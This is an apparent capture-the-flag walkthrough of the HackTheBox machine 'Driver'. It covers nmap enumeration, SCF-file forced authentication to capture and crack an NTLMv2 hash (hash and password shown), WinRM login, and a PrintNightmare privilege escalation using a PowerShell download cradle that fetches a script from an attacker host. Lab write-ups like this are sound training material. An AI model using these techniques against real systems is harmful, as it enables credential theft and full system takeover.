Enumeration With Nmap
nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.106
# Nmap 7.91 scan initiated Wed Dec 1 08:23:44 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.10.11.106 Increasing send delay for 10.10.11.106 from 0 to 5 due to 11 out of 17 dropped probes since last increase. Nmap scan report for 10.10.11.106 Host is up (0.26s latency). Not shown: 65531 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 5985/tcp open wsman Read data files from: /usr/bin/../share/nmap # Nmap done at Wed Dec 1 08:25:21 2021 -- 1 IP address (1 host up) scanned in 97.47 seconds
Now let use nmap default script and service detection to get more information from the target.
nmap -sC -sV -oA nmap/normal -p 80,135,445,5985 10.10.11.106
# Nmap 7.91 scan initiated Wed Dec 1 08:25:42 2021 as: nmap -sC -sV -oA nmap/normal -p 80,135,445,5985 10.10.11.106 Nmap scan report for 10.10.11.106 Host is up (0.27s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 9h59m53s, deviation: 0s, median: 9h59m53s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-12-01T17:25:51 |_ start_date: 2021-12-01T13:29:00 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Dec 1 08:26:33 2021 -- 1 IP address (1 host up) scanned in 51.33 seconds
So we are dealing with a windows is cool i guess i know it been long we work on a windows so let just jump into to fire on. so we have some interesting ports like HTTP,SMB and WINRM let start our enumeration on SMB to see if we have anonymous access to a share.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ smbclient -L //10.10.11.106/ -N session setup failed: NT_STATUS_ACCESS_DENIED
Boom no anonymous access to connect to SMB seems it time to see what we have on the HTTP port.
Seems we need a credentials let try using
Boom we are in let look arounf to see what we can find and loot.
So we found a upload page seems interesting i try uploading a php reverse shell to see what would happened but guess what nothing and i was unable to get the location the php file was store so i decided to read around and get more infromation of what we are dealing with.
Forced Authentication In Windows
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system.  This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443.
Credential Access, Stealing hashes Some pretty good resources here Forced Authentication now back to exploit it.
Execution via .SCF
Place the below
fa.scf file on the attacker controlled machine at
10.0.0.7 in a shared folder
tools that i will be creating.
[Shell] Command=2 IconFile=\\10.0.0.5\tools\nc.ico [Taskbar] Command=ToggleDesktop
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ cd tools ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106/tools] └─$ ls @fa.scf ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106/tools] └─$ cat @fa.scf [Shell] Command=2 IconFile=\\10.0.0.5\share\muzec.ico [Taskbar] Command=ToggleDesktop ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106/tools]
A victim user low opens the share
\\10.0.0.7\tools and the
fa.scf gets executed automatically, which in turn forces the victim system to attempt to authenticate to the attacking system at
10.0.0.5 where responder is listening:
sudo responder -I tun0 -wrfv
Now let upload the
Now let submit upload and go back to see what
responder have for us.
Boom hashes flying lol now let save the hash in file to crack using john the ripper.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ cat hash tony::DRIVER:8a951208ff761ccb:84E8A643D43D7A11C1079DC2518D854B:0101000000000000C0653150DE09D201260A1A1D9BF576BD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000BDA5F8BCE4AC6BDB9CA217BA5B8DE361269F945ABF489FF68EE134226EBB88CC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003700000000000000000000000000 ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ john --wordlis=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) No password hashes left to crack (see FAQ) ┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ john --show hash tony:liltony:DRIVER:8a951208ff761ccb:84E8A643D43D7A11C1079DC2518D854B:0101000000000000C0653150DE09D201260A1A1D9BF576BD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000200000BDA5F8BCE4AC6BDB9CA217BA5B8DE361269F945ABF489FF68EE134226EBB88CC0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0032003700000000000000000000000000 1 password hash cracked, 0 left
Now seems we have the winrm port open
5985 let hit it with the credentials using
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ evil-winrm -i driver.htb -u tony Enter Password:
Boom we are in.
user.txt it time to get system. I really spend some time here man run
winpeas but got nothing so when doing reserach i found something cool about a printer.
Since the machine is related to a printer let give it a shot and confirm if it really vulnerable.
Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 Summary
A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
UPDATE July 7, 2021: The security update for Windows Server 2012, Windows Server 2016 and Windows 10, Version 1607 have been released. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability.
In addition to installing the updates, in order to secure your system, you must confirm that the following registry settings are set to 0 (zero) or are not defined (Note: These registry keys do not exist by default, and therefore are already at the secure setting.), also that your Group Policy setting are correct (see FAQ):
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting) UpdatePromptSettings = 0 (DWORD) or not defined (default setting)
Having NoWarningNoElevationOnInstall set to 1 makes your system vulnerable by design.
UPDATE July 6, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. If you are unable to install these updates, see the FAQ and Workaround sections in this CVE for information on how to help protect your system from this vulnerability. See also KB5005010: Restricting installation of new printer drivers after applying the July 6, 2021 updates.
Note that the security updates released on and after July 6, 2021 contain protections for CVE-2021-1675 and the additional remote code execution exploit in the Windows Print Spooler service known as “PrintNightmare”, documented in CVE-2021-34527.
Get-Service -Name Spooler
Boom we have it running now let exploit it.
Written in powershell let download it and transfer it to our target.
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.77:8000/CVE-2021-34527.ps1')"
But when i try to run the powershell script i got failed so i decided to transfer it again.
iex (New-Object Net.WebClient).DownloadString("http://10.10.14.77:8000/CVE-2021-34527.ps1")
So let run it again.
Invoke-Nightmare -DriverName "Xerox" -NewUser "muzec" -NewPassword "muzec"
Boom Boom exploited successfully and
muzec was added as local administrator cool let confirm it.
┌──(muzec㉿Muzec-Security)-[~/Documents/HTB/10.10.11.106] └─$ evil-winrm -i driver.htb -u muzec
We are done thanks for reading man.
Greeting From Muzec